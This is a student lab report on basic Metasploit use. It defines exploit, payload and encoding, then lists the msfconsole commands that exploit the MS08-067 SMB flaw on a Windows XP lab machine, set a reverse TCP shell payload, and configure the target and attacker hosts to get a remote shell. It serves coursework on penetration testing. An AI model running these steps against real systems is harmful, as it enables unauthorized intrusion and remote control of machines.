2017-2018-2 20155310 "Network Countermeasure Technology" Exp5: MSF Basic Application
basic question answer
Explain what is exploit, payload, encode in your own words
Exploit: Exploiting a security hole in a system, application or service by an attacker or penetration tester
Payload: Attack payload, such as backdoor and other attack codes.
encode: refers to encoding, disguising our program or code.
Experimental content
An active attack practice such as ms08_067
1. Enable msf terminal msfconsole
2. Then use the search command to search for the module corresponding to the vulnerability: search ms08_067
3. The path name of the penetration attack module is "exploit/windows/smb/ms08_067_netapi", which includes four parts: module type, target platform, target service and module name.
use exploit/windows/smb/ms08_067_netapi
1. View information:
show payloads
2. Select the attack payload:
set payload generic/shell_reverse_tcp
3. View the configuration items required to configure penetration attacks:
show options
4. View the target platforms that the penetration attack module can successfully penetrate and attack
show targets
5. Use show payloads to see the available payloads for us:
6. Find an available attack payload generic/shell_reverse_tcp and set the payload with set payload generic/shell_reverse_tcp:
7. Use show options to view the parameters that need to be set
• Here you need to set RHOST (target IP) and LHOST (Kali's IP), use the set parameter name parameter value command to be set to set:
8. Set the target option target (for example, my attack system is WIN xp Chinese Simplified SP2, so choose 10)
• After confirming that the parameter settings are correct, use the exploit command to start the attack:
9. After the attack is successful, the shell of the target machine will be obtained, which can be operated: